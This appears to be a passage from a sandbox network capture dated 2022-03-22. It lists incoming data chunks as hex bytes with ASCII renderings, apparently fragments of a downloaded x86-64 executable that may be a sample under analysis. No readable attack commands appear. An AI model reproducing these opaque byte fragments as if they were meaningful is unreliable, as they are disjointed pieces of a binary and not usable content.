2022-03-22 15:50:26 UTC	117	IN	Data Raw: 00 00 00 48 8d 15 14 22 0a 00 4c 89 f9 e8 05 19 06 00 48 89 e9 ba 01 00 00 00 e8 5b 54 fe ff 48 8d 15 13 0d 0a 00 4c 89 f9 41 89 c0 e8 2c 19 06 00 48 89 e9 ba 04 00 00 00 e8 3c 54 fe ff 8d 48 02 48 63 c9 48 69 c9 56 55 55 55 48 89 ca 48 c1 ea 3f 48 c1 e9 20 01 d1 8d 0c 49 f7 d9 44 8d 04 08 41 83 c0 02 48 8d 15 3a e2 09 00 4c 89 f9 e8 e9 18 06 00 48 89 e9 ba 05 00 00 00 e8 42 53 fe ff 44 0f b6 c0 48 8d 15 7f 36 0a 00 4c 89 f9 e8 c9 18 06 00 48 89 e9 ba 06 00 00 00 e8 d9 53 fe ff 4c 63 c0 49 69 c0 89 88 88 88 48 c1 e8 20 41 01 c0 44 89 c0 c1 e8 1f 41 c1 f8 05 41 01 c0 48 8d 15 39 24 0a 00 4c 89 f9 e8 8f 18 06 00 48 89 e9 ba 06 00 00 00 e8 9f 53 fe ff 4c 63 c0 49 69 c0 89 88 88 88 48 c1 e8 20 44 01 c0 89 c1 c1 e9 1f c1 f8 05 01 c8 6b c0 3c 41 29 c0 48 8d 15 Data Ascii: H"LH[THLA,H<THHcHiVUUUHH?H IDAH:LHBSDH6LHSLcIiH ADAAH9$LHSLcIiH Dk<A)H
2022-03-22 15:50:26 UTC	125	IN	Data Raw: 00 4c 89 e9 ba 02 00 00 00 e8 77 3c fe ff 44 8b 05 e8 8c 0b 00 c7 44 24 20 01 00 00 00 48 8d 15 d5 ed 09 00 48 89 f1 4d 89 e9 e8 ec 1c 00 00 48 89 f9 e8 0c 24 ff ff c7 44 24 20 03 00 00 00 48 8d 15 71 b3 09 00 48 89 f1 45 31 c0 4d 89 e9 e8 c7 1c 00 00 48 8d 3d 0b c3 09 00 48 89 f9 ba 01 00 00 00 e8 62 b0 04 00 48 89 f1 48 89 fa 41 89 c0 e8 e6 fb 05 00 8d 48 01 48 63 c9 48 69 c9 56 55 55 55 48 89 ca 48 c1 ea 3f 48 c1 e9 20 01 d1 8d 0c 49 f7 d9 44 8d 04 08 41 ff c0 4c 89 e9 ba 04 00 00 00 e8 dc 3b fe ff c7 44 24 20 05 00 00 00 48 8d 15 13 17 0a 00 48 89 f1 41 b0 01 4d 89 e9 e8 98 1c 00 00 48 8d 3d f2 04 0a 00 48 89 f9 31 d2 e8 f3 af 04 00 48 89 f1 48 89 fa 41 89 c0 e8 77 fb 05 00 89 c7 48 8d 1d 20 d9 09 00 48 89 d9 31 d2 e8 d2 af 04 00 48 89 f1 48 89 da 41 Data Ascii: Lw<DD$ HHMH$D$ HqHE1MH=HbHHAHHcHiVUUUHH?H IDAL;D$ HHAMH=H1HHAwH H1HHA
2022-03-22 15:50:26 UTC	133	IN	Data Raw: 5f 5e 41 5c 41 5d 41 5e 41 5f c3 41 57 41 56 41 55 41 54 56 57 55 53 48 83 ec 58 4d 89 cd 44 89 c6 48 89 54 24 38 8b ac 24 c0 00 00 00 e8 14 28 04 00 89 f1 48 89 4c 24 50 48 8d 0c cd 00 00 00 00 4c 8d 34 49 31 c9 48 89 4c 24 30 49 89 c4 c7 44 24 2c 00 00 00 00 4c 89 e7 49 ff c4 8a 0f 80 f9 2c 75 08 48 ff c7 49 ff c4 eb f1 84 c9 0f 84 a1 00 00 00 84 c9 74 0e 80 f9 2c 74 0e 41 8a 0c 24 49 ff c4 eb ee 49 ff cc eb 06 41 c6 44 24 ff 00 85 f6 7e c2 48 89 44 24 40 31 db 48 8b 44 24 38 48 8b 0c 18 48 89 fa e8 04 1a 07 00 85 c0 74 10 48 83 c3 18 49 39 de 75 e2 48 8b 44 24 40 eb 96 48 8b 44 24 38 44 8b 4c 18 08 41 83 f9 ff 48 8b 44 24 40 74 81 ba 01 00 00 00 44 89 c9 d3 e2 8b 4c 24 2c 44 0f a3 c9 0f 82 69 ff ff ff 09 54 24 2c 4c 89 e9 89 ea 48 8b 7c 24 30 41 89 f8 Data Ascii: _^A\A]A^A_AWAVAUATVWUSHXMDHT$8$(HL$PHL4I1HL$0ID$,LI,uHIt,tA$IIAD$~HD$@1HD$8HHtHI9uHD$@HD$8DLAHD$@tDL$,DiT$,LH\|$0A
2022-03-22 15:50:26 UTC	141	IN	Data Raw: 60 4c 89 e9 4d 89 f5 e8 b7 e5 fe ff 49 89 fe 4c 89 f9 e8 12 cf 02 00 48 89 c5 4c 89 f9 e8 99 b8 fe ff 4c 8b 8e 80 00 00 00 44 8b 46 78 48 8b 4e f8 48 8b 56 70 48 89 7c 24 40 48 8b bc 24 80 00 00 00 48 89 7c 24 38 4c 89 64 24 30 48 89 6c 24 28 48 89 44 24 20 48 c7 44 24 48 00 00 00 00 e8 f1 c0 00 00 48 89 86 70 01 00 00 48 8b 8e 68 01 00 00 48 89 48 08 4c 89 68 40 48 8b 4e f0 48 89 48 50 48 89 58 58 48 8b 4e 28 48 89 48 48 8b 4e 08 89 48 60 4d 85 f6 74 0f 48 8b 96 70 01 00 00 4c 89 f1 e8 cd f5 00 00 48 8d 86 70 01 00 00 48 8b 8e 70 01 00 00 48 89 41 38 48 8b 96 68 01 00 00 48 8b 8e 70 01 00 00 4c 8d 42 58 48 83 c2 20 e8 68 c2 01 00 48 8b 4e f0 48 8b 01 ff 50 28 48 8d 56 18 48 8b 4e f8 e8 85 55 ff ff 48 89 86 98 01 00 00 b9 a8 00 00 00 48 03 8e 68 01 00 00 Data Ascii: `LMILHLLDFxHNHVpH\|$@H$H\|$8Ld$0Hl$(HD$ HD$HHpHhHHLh@HNHHPHXXHN(HHHNH`MtHpLHpHpHA8HhHpLBXH hHNHP(HVHNUHHh
2022-03-22 15:50:26 UTC	148	IN	Data Raw: 00 0f 84 8b 02 00 00 31 ed b9 01 00 00 00 ba 38 00 00 00 45 31 c0 e8 ee c5 fe ff 48 89 c3 48 89 30 48 89 c1 e8 fd f1 ff ff 89 7b 08 48 8d 53 28 48 8b 4e 70 40 88 6c 24 20 45 31 c0 41 b9 ff ff ff ff e8 84 d4 05 00 48 89 43 20 89 7b 08 40 88 6b 14 48 8b 86 d8 00 00 00 48 8b 00 b9 15 00 00 00 ff 50 18 48 89 c7 8b 53 08 48 8d 68 60 48 89 e9 e8 07 c0 fe ff 8b 53 0c 48 89 e9 e8 fc bf fe ff 48 8d 57 40 48 8b 8e e8 00 00 00 e8 00 96 01 00 48 8d 0d e6 a6 09 00 e9 2c 02 00 00 48 83 c3 28 48 89 d9 e8 88 c2 fe ff 41 89 c6 48 8d 7c 24 40 48 89 f9 48 89 da e8 a9 c2 fe ff 0f 10 07 0f 29 44 24 30 48 89 d9 e8 65 c2 fe ff 89 c5 0f 28 44 24 30 0f 29 07 48 8d 7c 24 40 48 89 f9 e8 12 f4 03 00 48 89 47 10 89 6f 04 48 8b 4e 78 48 8d 54 24 40 45 31 c0 e8 6f dd 03 00 48 85 c0 0f Data Ascii: 18E1HH0H{HS(HNp@l$ E1AHC {@kHHPHSHh`HSHHW@HH,H(HAH\|$@HH)D$0He(D$0)H\|$@HHGoHNxHT$@E1oH
2022-03-22 15:50:26 UTC	156	IN	Data Raw: 49 8b 87 38 02 00 00 48 8b 00 b9 20 00 00 00 ff 50 18 48 89 c5 48 8d 48 60 48 89 da e8 41 a2 fe ff 48 83 c5 40 49 8b 8f 48 02 00 00 48 89 ea e8 1d 77 01 00 48 ff c7 ff ce 0f 85 79 ff ff ff 48 8d 0d ac 50 09 00 e8 d9 c9 03 00 49 8b 4c 24 48 48 89 c2 e8 6e 8b fe ff eb 5d 48 8d 0d 23 ac 09 00 e8 be c9 03 00 49 8b 4c 24 48 48 89 c2 e8 53 8b fe ff 41 8b 8c 24 90 fe ff ff 49 8b 44 24 08 48 8b 00 ff 50 18 48 89 c7 49 8b 84 24 80 fe ff ff 48 8b 40 38 48 8b 08 e8 d1 d0 fe ff 48 8d 4f 60 48 89 c2 e8 91 a1 fe ff 48 8d 57 40 49 8b 4c 24 18 e8 9a 76 01 00 41 c6 84 24 f5 fd ff ff 00 48 8d 0d af ab 09 00 e8 58 c9 03 00 49 8b 4c 24 48 48 89 c2 e8 ed 8a fe ff 49 8b 8c 24 80 fe ff ff e8 9c d0 fe ff 49 c7 84 24 80 fe ff ff 00 00 00 00 41 c7 84 24 d0 fd ff ff 5c 04 00 00 4c Data Ascii: I8H PHHH`HAH@IHHwHyHPIL$HHn]H#IL$HHSA$ID$HPHI$H@8HHO`HHW@IL$vA$HXIL$HHI$I$A$\L
2022-03-22 15:50:26 UTC	164	IN	Data Raw: 38 48 63 53 10 48 03 53 20 48 8b 43 68 48 8b 48 08 e8 e3 80 fe ff 8b 43 10 03 43 38 89 43 10 48 63 d0 48 03 53 20 48 8b 4b 68 e8 c6 c8 01 00 84 c0 0f 84 66 03 00 00 48 8b 43 20 8b 08 0f c9 89 4b 04 8b 43 10 8d 50 fc 39 d1 0f 85 50 03 00 00 48 98 4c 63 43 14 49 01 c0 44 89 43 1c b9 01 00 00 00 ba 50 00 00 00 e8 1d 87 fe ff 48 89 43 40 31 c9 48 89 48 08 48 8b 43 40 48 89 48 10 48 8b 43 40 c7 00 00 00 00 00 48 8b 43 40 c6 40 20 00 48 8b 53 20 48 8b 4b 40 48 83 c1 50 48 89 4b 30 4c 63 43 1c e8 e8 b4 05 00 48 8b 43 30 0f b6 48 04 89 4b 08 83 f9 04 0f 82 5a 03 00 00 8b 43 04 29 c8 0f 8e 4f 03 00 00 8d 48 ff 89 4b 0c 83 c0 04 89 43 18 48 8b 43 48 80 38 00 74 12 8b 48 04 2b 4b 10 76 05 89 48 04 eb 05 66 c7 00 00 01 8b 43 58 8d 48 01 89 4b 58 48 8b 4b 40 89 41 04 Data Ascii: 8HcSHS HChHHCC8CHcHS HKhfHC KCP9PHLcCIDCPHC@1HHHC@HHHC@HC@@ HS HK@HPHK0LcCHC0HKZC)OHKCHCH8tH+KvHfCXHKXHK@A
2022-03-22 15:50:26 UTC	172	IN	Data Raw: 8b 8e d8 00 00 00 e8 c6 38 01 00 e9 db 03 00 00 41 f6 47 18 01 0f 85 ee 06 00 00 48 89 e9 e8 4e 65 fe ff 41 01 47 70 41 f6 47 18 01 0f 85 d7 06 00 00 4c 89 f9 e8 2f 10 00 00 85 c0 0f 85 c7 06 00 00 41 c6 47 1e 00 4c 89 f9 e8 72 0e 00 00 e9 b5 06 00 00 48 89 e9 e8 15 65 fe ff 89 c7 48 8d 8c 24 e0 05 00 00 48 89 ea e8 37 65 fe ff 41 83 7c 24 40 00 0f 85 8f 06 00 00 4c 8b 84 24 e0 05 00 00 4c 8b 8c 24 e8 05 00 00 45 29 4f 78 45 29 8f 80 00 00 00 83 ff 02 b8 00 00 00 00 4c 0f 43 c8 83 ff 01 0f 94 c2 49 8b 8f a8 00 00 00 48 8b 01 ff 50 18 49 83 bf a0 00 00 00 00 0f 85 47 06 00 00 48 89 c3 41 83 bf 80 00 00 00 00 7f 1e 41 83 bf 98 00 00 00 02 75 14 41 8b 47 7c 3d ff ff ff 3f 7f 09 05 00 40 00 00 41 89 47 7c 41 8b 47 7c 89 c2 29 da 7e 0c 4c 89 f9 e8 aa 0c 00 00 Data Ascii: 8AGHNeAGpAGL/AGLrHeH$H7eA\|$@L$L$E)OxE)LCIHPIGHAAuAG\|=?@AG\|AG\|)~L
2022-03-22 15:50:26 UTC	180	IN	Data Raw: e8 78 43 fe ff 49 8d 56 40 48 8b 4f 28 e8 7f 19 01 00 48 8b 4f b8 48 85 c9 75 1d 48 8d 0d a9 d7 09 00 48 8d 15 1e e3 09 00 41 b8 28 01 00 00 e8 e5 24 06 00 48 8b 4f b8 48 89 f2 e8 c6 68 03 00 48 39 f0 74 19 48 8d 0d cb dd 09 00 48 8d 15 f4 e2 09 00 41 b8 2a 01 00 00 e8 bb 24 06 00 48 89 f1 48 83 c4 28 5b 5f 5e 41 5e e9 2d 31 02 00 41 56 56 57 53 48 83 ec 28 49 89 d6 48 89 ce 48 8d 99 50 ff ff ff b9 01 00 00 00 ba c0 00 00 00 45 31 c0 e8 72 48 fe ff 48 89 c7 48 89 18 48 89 c1 e8 87 d5 ff ff c6 47 14 01 4c 89 b7 a8 00 00 00 48 8d 0d 96 29 09 00 e8 a8 6b 03 00 48 8b 4e 58 48 89 c2 e8 3e 2d fe ff 48 8d 15 2b 1f 09 00 48 89 f9 e8 ef d5 ff ff 48 8d 50 40 48 8b 4e 28 e8 ad 18 01 00 48 81 c7 b0 00 00 00 48 89 f8 48 83 c4 28 5b 5f 5e 41 5e c3 48 83 ec 28 48 8d 0d Data Ascii: xCIV@HO(HOHuHHA($HOHhH9tHHA*$HH([_^A^-1AVVWSH(IHHPE1rHHHHGLH)kHNXH>-H+HHP@HN(HHH([_^A^H(H
2022-03-22 15:50:26 UTC	188	IN	Data Raw: 8d 1d 2a 0c 00 00 48 89 5c 24 38 48 89 7c 24 30 48 89 74 24 28 48 89 44 24 20 ff 55 40 41 89 85 70 03 00 00 48 89 f1 e8 17 2a fe ff 48 89 f9 e8 2c a7 01 00 41 c7 45 04 68 03 00 00 e9 95 e7 ff ff 49 8b 8d d8 01 00 00 e8 72 05 00 00 84 c0 0f 85 ae e7 ff ff 49 83 bd c8 00 00 00 00 0f 84 ef 00 00 00 41 c6 85 6b 03 00 00 01 e9 93 e7 ff ff 49 8b 8d d8 01 00 00 49 8b 95 d0 02 00 00 e8 ac 04 00 00 84 c0 74 5c 48 89 f9 e8 b4 29 fe ff e9 6f e7 ff ff 48 85 c0 75 20 48 8d 0d 4b b8 09 00 48 8d 15 38 c3 09 00 41 b8 8f 03 00 00 e8 27 05 06 00 49 8b 85 c8 02 00 00 49 8b 8d d0 00 00 00 48 89 c2 e8 29 3f 06 00 85 c0 0f 84 33 e7 ff ff 49 8b 8d 68 10 00 00 48 8d 15 8f 28 09 00 e9 2f fa ff ff 48 8d 0d 35 62 09 00 e8 35 4c 03 00 49 8b 8d 58 10 00 00 48 89 c2 e8 c8 0d fe ff 48 Data Ascii: H\$8H\|$0Ht$(HD$ U@ApHH,AEhIrIAkIIt\H)oHu HKH8A'IIH)?3IhH(/H5b5LIXHH
2022-03-22 15:50:26 UTC	195	IN	Data Raw: 01 00 00 48 89 f9 e8 b6 38 03 00 84 c0 75 12 49 83 c5 18 49 81 fd 80 01 00 00 75 ce e9 73 03 00 00 48 8b 54 24 70 49 29 d5 0f b6 44 24 64 f6 c3 01 bd 00 00 00 00 0f 45 e8 48 8b 8c 24 90 00 00 00 4c 89 ac cc 90 01 00 00 49 89 cd f6 84 24 98 00 00 00 01 0f 45 e8 48 83 f9 01 0f 47 e8 49 ff c5 48 81 c2 80 fe ff ff 49 81 c4 80 01 00 00 49 83 fd 08 4c 8b 74 24 58 0f 85 01 fe ff ff 48 8b 94 24 20 03 00 00 48 8d 8c 24 40 01 00 00 e8 52 07 fe ff 48 8b 94 24 20 03 00 00 48 8d 8c 24 40 01 00 00 e8 3d 07 fe ff 48 8b 94 24 f0 02 00 00 48 8d 8c 24 40 01 00 00 e8 28 07 fe ff 48 8b 94 24 f0 02 00 00 48 8d 8c 24 40 01 00 00 e8 13 07 fe ff 48 8b 8c 24 f0 02 00 00 e8 6c 06 fe ff 40 f6 c5 01 0f 94 c1 20 c1 41 88 8e 75 03 00 00 31 c0 4c 8d 05 a9 0e 00 00 31 f6 48 8b bc 24 80 Data Ascii: H8uIIusHT$pI)D$dEH$LI$EHGIHIILt$XH$ H$@RH$ H$@=H$H$@(H$H$@H$l@ Au1L1H$
2022-03-22 15:50:26 UTC	203	IN	Data Raw: e8 ab 12 03 00 48 8b 8e 58 ff ff ff 48 89 44 29 08 48 8b 96 48 ff ff ff 4c 89 e9 e8 85 e8 fd ff 48 8b 86 58 ff ff ff 48 8b 4c 28 08 48 83 c1 18 4c 89 ea e8 87 e4 fd ff 4c 8b be 58 ff ff ff 49 8b 04 2f 48 8b 48 08 48 8b 40 10 48 89 8c 24 50 01 00 00 48 89 84 24 60 01 00 00 48 c7 84 24 58 01 00 00 00 00 00 00 c7 84 24 68 01 00 00 00 00 00 00 48 89 9c 24 70 01 00 00 4c 89 e1 48 89 da e8 20 e8 fd ff 0f 10 84 24 20 01 00 00 41 0f 11 44 2f 10 48 83 c5 20 48 39 ef 0f 85 2a ff ff ff 48 8d 0d 04 91 08 00 48 8b 7c 24 40 48 89 fa e8 f0 0d 03 00 48 8b 4e 48 48 89 c2 e8 86 cf fd ff 48 8b 86 f0 fe ff ff 48 85 c0 0f 84 bb 04 00 00 48 85 ff 4c 8b 7c 24 48 74 64 4c 8b 68 08 48 8b 68 10 31 db 4c 8d b4 24 50 01 00 00 4c 8d a4 24 10 01 00 00 31 ff 48 8b 86 58 ff ff ff 48 8b Data Ascii: HXHD)HHLHXHL(HLLXI/HHH@H$PH$`H$X$hH$pLH $ AD/H H9*HH\|$@HHNHHHHHL\|$HtdLhHh1L$PL$1HXH
2022-03-22 15:50:26 UTC	211	IN	Data Raw: ff ff 03 00 00 00 c7 86 f8 fd ff ff f7 02 00 00 4c 89 f9 e8 a2 0b 00 00 48 8b 4e 10 48 89 ca 41 b0 01 ff 51 30 48 85 c0 0f 84 03 fc ff ff 48 89 c2 83 38 3c 74 35 48 83 c2 08 48 8b 4e 10 e8 09 9d 00 00 48 8b 86 60 ff ff ff 48 ff c0 48 89 86 60 ff ff ff 48 3b 86 68 ff ff ff 0f 82 48 ef ff ff 41 c6 47 65 01 e9 3e ef ff ff 48 8b 86 58 ff ff ff 48 8b 8e 60 ff ff ff 48 c1 e1 05 48 8b 44 08 08 48 8b 78 08 48 8b 58 10 48 8b 4e 50 48 8b 01 ff 90 90 00 00 00 84 c0 74 24 48 89 d9 e8 4b f0 02 00 48 8d 0d e7 49 09 00 89 c2 49 89 f8 e8 b0 ee 02 00 48 89 f1 48 89 c2 e8 a3 a9 00 00 48 8b 46 08 48 8b 00 b9 32 00 00 00 ff 50 18 48 89 46 88 48 8b 96 d0 fe ff ff 48 8d 48 60 e8 98 c6 fd ff 48 8b 86 08 fe ff ff 48 8b 4e 88 48 8b 00 48 8b 50 40 48 83 c1 60 e8 7d c6 fd ff 48 8b Data Ascii: LHNHAQ0HH8<t5HHNH`HH`H;hHAGe>HXH`HHDHxHXHNPHt$HKHIIHHHFH2PHFHHH`HHNHHP@H`}H
2022-03-22 15:50:26 UTC	219	IN	Data Raw: ff ff 66 0f 38 de 91 38 ff ff ff 66 0f 38 de 91 48 ff ff ff 66 0f 38 de 91 58 ff ff ff 66 0f 38 de 91 68 ff ff ff 66 0f 38 de 91 78 ff ff ff 66 0f 38 de 51 88 66 0f 38 de 51 98 66 0f 38 de 51 a8 66 0f 38 df 51 b8 66 0f ef d0 f3 0f 7f 12 66 0f 7f 49 e8 48 83 c2 10 66 0f 6f c1 48 39 c2 0f 82 72 ff ff ff c3 45 85 c0 0f 8e d6 00 00 00 49 63 c0 48 01 d0 66 0f 6f 59 e8 66 0f 6f 05 1f 50 07 00 66 0f 6f 0d 27 50 07 00 66 0f ef d2 66 0f 38 00 d8 66 0f ef 99 08 fe ff ff 66 0f 38 dc 99 18 fe ff ff 66 0f 38 dc 99 28 fe ff ff 66 0f 38 dc 99 38 fe ff ff 66 0f 38 dc 99 48 fe ff ff 66 0f 38 dc 99 58 fe ff ff 66 0f 38 dc 99 68 fe ff ff 66 0f 38 dc 99 78 fe ff ff 66 0f 38 dc 99 88 fe ff ff 66 0f 38 dc 99 98 fe ff ff 66 0f 38 dc 99 a8 fe ff ff 66 0f 38 dc 99 b8 fe ff ff 66 Data Ascii: f88f8Hf8Xf8hf8xf8Qf8Qf8Qf8QffIHfoH9rEIcHfoYfoPfo'Pff8ff8f8(f88f8Hf8Xf8hf8xf8f8f8f8f
2022-03-22 15:50:26 UTC	227	IN	Data Raw: 48 89 c3 48 c1 eb 02 48 21 eb 48 09 f3 4c 33 64 24 28 48 31 c3 4a 8d 34 cd 00 00 00 00 49 d1 e9 48 bd 88 88 88 88 88 88 88 88 48 21 ee 4c 89 c0 4d 21 c1 49 09 f1 48 8d 34 dd 00 00 00 00 48 21 ee 49 89 e8 48 d1 eb 48 21 c3 48 09 f3 48 31 ca 4c 33 6c 24 60 49 31 dd 4a 8d 0c b5 00 00 00 00 48 bd cc cc cc cc cc cc cc cc 48 21 e9 4d 31 f5 49 c1 ee 02 48 be 33 33 33 33 33 33 33 33 49 21 f6 49 09 ce 48 8d 0c fd 00 00 00 00 4c 21 c1 48 d1 ef 48 21 c7 48 09 cf 4a 8d 0c dd 00 00 00 00 49 d1 eb 4c 21 c1 49 21 c3 49 09 cb 4c 8b 44 24 48 4c 33 44 24 20 4a 8d 34 a5 00 00 00 00 48 21 ee 4c 89 e1 48 c1 e9 02 48 bd 33 33 33 33 33 33 33 33 48 21 e9 48 09 f1 4c 33 44 24 58 4c 33 64 24 38 66 0f ef d4 66 0f 6f e2 66 0f 73 f4 03 66 0f 6f f2 66 0f 73 d6 01 66 41 0f 6f fc 66 0f Data Ascii: HHH!HL3d$(H1J4IHH!LM!IH4H!IHH!HH1L3l$`I1JHH!M1IH33333333I!IHL!HH!HJIL!I!ILD$HL3D$ J4H!LHH33333333H!HL3D$XL3d$8ffofsfofsfAof
2022-03-22 15:50:26 UTC	234	IN	Data Raw: ff ba 10 01 00 00 48 89 f1 e8 c3 f0 03 00 48 89 f1 48 83 c4 20 5e e9 a8 6e fd ff 56 57 55 53 48 81 ec 28 01 00 00 48 89 d3 48 89 cf 48 8b 05 6e cb 09 00 48 31 e0 48 89 84 24 20 01 00 00 48 8b 01 8b 68 50 81 fd 01 01 00 00 72 19 48 8d 0d 76 1f 09 00 48 8d 15 43 0d 09 00 41 b8 28 00 00 00 e8 f4 49 05 00 48 8d b7 f8 fe ff ff 66 c7 87 f8 fe ff ff 00 00 31 c9 88 8c 0f fa fe ff ff 89 c8 31 d2 f7 f5 8a 04 13 88 44 0c 20 48 ff c1 48 81 f9 00 01 00 00 75 e0 31 c0 31 c9 0f b6 94 07 fa fe ff ff 89 d5 01 cd 0f b6 4c 04 20 01 e9 0f b6 c9 8a 9c 0f fa fe ff ff 88 9c 07 fa fe ff ff 88 94 0f fa fe ff ff 48 ff c0 48 3d 00 01 00 00 75 ca b9 00 06 00 00 ba 01 00 00 00 45 31 c0 e8 66 6d fd ff 48 89 c7 41 b8 00 06 00 00 48 89 c1 31 d2 e8 bb 9f 04 00 48 89 f1 48 89 fa 41 b8 00 Data Ascii: HHH ^nVWUSH(HHHnH1H$ HhPrHvHCA(IHf11D HHu11L HH=uE1fmHAH1HHA
2022-03-22 15:50:26 UTC	242	IN	Data Raw: c1 c0 28 48 8b 4c 24 38 48 01 f9 48 89 4c 24 38 49 31 cc 49 c1 c4 28 48 8d 0d 43 f5 06 00 44 0f b6 7c 0d f6 4a 03 54 fc 60 4c 01 f6 48 8b 5c 24 30 48 01 c3 4c 01 e2 44 0f b6 7c 0d f7 49 31 f1 4d 01 ea 4e 03 54 fc 60 49 31 d8 48 31 d7 4d 31 d3 49 c1 c1 30 49 c1 c3 20 49 c1 c0 30 44 0f b6 7c 0d f8 48 8b 4c 24 48 4c 01 d9 48 89 4c 24 48 48 c1 c7 30 49 31 cd 49 c1 c5 28 4c 01 4c 24 40 4e 03 54 fc 60 4d 01 ea 4c 01 44 24 28 4d 31 d3 49 c1 c3 30 48 01 7c 24 38 48 89 e9 48 89 6c 24 50 4c 8d 3d b9 f4 06 00 42 0f b6 6c 3d f9 48 03 74 ec 60 4c 33 74 24 40 42 0f b6 6c 39 fb 48 89 d9 48 03 4c ec 60 48 33 44 24 28 4c 33 64 24 38 4d 89 cf 48 8b 5c 24 50 48 8d 2d 82 f4 06 00 44 0f b6 4c 2b fd 49 d1 c6 4a 03 54 cc 60 48 d1 c0 4c 01 5c 24 48 44 0f b6 4c 2b fa 49 d1 c4 48 Data Ascii: (HL$8HHL$8I1I(HCD\|JT`LH\$0HLD\|I1MNT`I1H1M1I0I I0D\|HL$HLHL$HH0I1I(LL$@NT`MLD$(M1I0H\|$8HHl$PL=Bl=Ht`L3t$@Bl9HHL`H3D$(L3d$8MH\$PH-DL+IJT`HL\$HDL+IH
2022-03-22 15:50:26 UTC	250	IN	Data Raw: 41 38 0f ca 89 51 3c b8 40 00 00 00 89 81 80 00 00 00 44 89 81 bc 00 00 00 89 91 c0 00 00 00 89 81 04 01 00 00 48 c7 81 b4 00 00 00 01 00 00 00 ba 08 00 00 00 4c 89 c9 e8 14 b2 03 00 48 8b 4c 24 30 48 31 e1 e8 27 4c 04 00 90 48 83 c4 38 c3 cc 56 57 48 83 ec 28 48 89 d6 48 89 cf 48 89 d1 e8 3a 00 00 00 48 89 3e 48 8b 47 08 48 89 46 08 48 89 77 08 48 8b 46 08 48 89 30 48 8b 46 10 48 01 47 20 48 8b 4f 28 48 85 c9 74 0b 48 83 c4 28 5f 5e e9 3a 23 fc ff 90 48 83 c4 28 5f 5e c3 56 48 83 ec 20 48 89 ce 80 79 18 00 74 1b 48 8b 06 48 8b 4e 08 48 89 48 08 48 8b 06 48 8b 4e 08 48 89 01 48 83 c4 20 5e c3 48 83 3e 00 74 19 48 8d 0d 4a b7 08 00 48 8d 15 17 cb 08 00 41 b8 1a 00 00 00 e8 f2 0a 05 00 48 83 7e 08 00 74 d4 48 8d 0d 12 b7 08 00 48 8d 15 f7 ca 08 00 41 b8 1b Data Ascii: A8Q<@DHLHL$0H1'LH8VWH(HHH:H>HGHFHwHFH0HFHG HO(HtH(_^:#H(_^VH HytHHNHHHHNHH ^H>tHJHAH~tHHA
2022-03-22 15:50:26 UTC	258	IN	Data Raw: 89 cb c1 e3 04 31 c3 31 e9 48 89 c8 48 c1 e0 20 89 dd 66 c1 c5 08 48 09 d8 66 89 6f fb 48 89 da 48 c1 ea 10 88 57 fa 48 c1 eb 18 88 5f f9 88 0f 88 6f ff 48 89 ca 48 c1 ea 10 88 57 fe 48 c1 e9 18 88 4f fd 48 8b 4c 24 28 48 89 41 f8 41 83 c6 f8 48 83 c7 08 41 83 fe 08 0f 8f 4a fe ff ff 48 83 c4 48 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 41 57 41 56 41 55 41 54 56 57 55 53 48 83 ec 48 48 89 4c 24 28 45 85 c0 0f 8e 15 02 00 00 44 89 c6 48 89 d7 48 8b 4c 24 28 48 8d 81 78 fe ff ff 48 89 44 24 40 48 8d 81 78 ff ff ff 48 89 44 24 38 48 8d 81 f8 fe ff ff 48 89 44 24 30 83 c6 08 48 83 c7 07 41 bd 33 33 33 33 41 bc ff 00 ff 00 41 be 55 55 55 55 44 0f b6 3f 0f b6 47 ff 0f b6 4f fe 0f b6 57 fd 48 c1 e2 38 48 c1 e1 30 48 c1 e0 28 49 c1 e7 20 8b 6f f9 48 c1 e5 20 48 0f Data Ascii: 11HH fHfoHHWH_oHHWHOHL$(HAAHAJHH[]_^A\A]A^A_AWAVAUATVWUSHHHL$(EDHHL$(HxHD$@HxHD$8HHD$0HA3333AAUUUUD?GOWH8H0H(I oH H
2022-03-22 15:50:26 UTC	266	IN	Data Raw: c6 48 8d 58 18 4c 89 78 18 4c 89 30 4c 89 60 10 48 8b 7f 20 48 8b 57 20 48 8d 4c 24 30 e8 83 ee fc ff 48 8b 47 20 83 78 18 00 74 0a 48 c7 46 08 00 00 00 00 eb 1e 0f 10 44 24 30 48 8d 4c 24 20 0f 29 01 4c 89 f2 e8 51 14 00 00 48 89 46 08 48 85 c0 75 0a 48 89 d9 e8 49 02 00 00 31 db 48 8b 4c 24 70 48 31 e1 e8 86 0d 04 00 48 89 d8 48 83 c4 78 5b 5f 5e 41 5c 41 5e 41 5f c3 56 57 53 48 83 ec 60 4c 89 c3 48 8b 05 14 4e 09 00 48 31 e0 48 89 44 24 58 0f 10 02 48 8d 7c 24 30 0f 29 07 48 89 fa e8 c9 fe ff ff 48 89 c6 48 85 c0 74 43 48 8b 03 48 8b 4b 08 48 89 44 24 30 48 89 4c 24 40 48 c7 44 24 38 00 00 00 00 c7 44 24 48 00 00 00 00 48 89 7c 24 50 48 8d 5c 24 20 48 89 d9 48 89 fa e8 be ed fc ff 48 89 d9 e8 69 22 fd ff 48 89 46 f8 48 8b 4c 24 58 48 31 e1 e8 f1 0c 04 Data Ascii: HXLxL0L`H HW HL$0HG xtHFD$0HL$ )LQHFHuHI1HL$pH1HHx[_^A\A^A_VWSH`LHNH1HD$XH\|$0)HHHtCHHKHD$0HL$@HD$8D$HH\|$PH\$ HHHi"HFHL$XH1
2022-03-22 15:50:26 UTC	273	IN	Data Raw: e8 9f 07 fd ff 48 89 c7 48 8d 0d 0f 1f 08 00 e8 90 07 fd ff 48 89 c3 b9 03 00 00 00 e8 07 02 fd ff 48 89 c6 48 89 5c 24 38 48 89 7c 24 30 4c 89 6c 24 28 48 89 44 24 20 48 8d 0d 0a 3c 09 00 4c 89 f2 4d 89 f8 4d 89 e1 e8 6b 00 00 00 4c 89 f1 e8 37 02 fd ff 4c 89 f9 e8 2f 02 fd ff 4c 89 e1 e8 27 02 fd ff 4c 89 e9 e8 1f 02 fd ff 48 89 f9 e8 17 02 fd ff 48 89 d9 e8 0f 02 fd ff 48 89 f1 e8 07 02 fd ff 48 8d 05 35 16 08 00 48 89 05 be 3b 09 00 48 89 05 bf 3b 09 00 c6 05 f8 3b 09 00 01 48 8d 05 a1 3b 09 00 48 83 c4 40 5b 5f 5e 41 5c 41 5d 41 5e 41 5f c3 41 57 41 56 41 55 41 54 56 57 55 53 48 83 ec 28 4d 89 cf 4c 89 c7 48 89 d3 48 89 ce 4c 8b b4 24 a8 00 00 00 4c 8b a4 24 98 00 00 00 4c 8b ac 24 a0 00 00 00 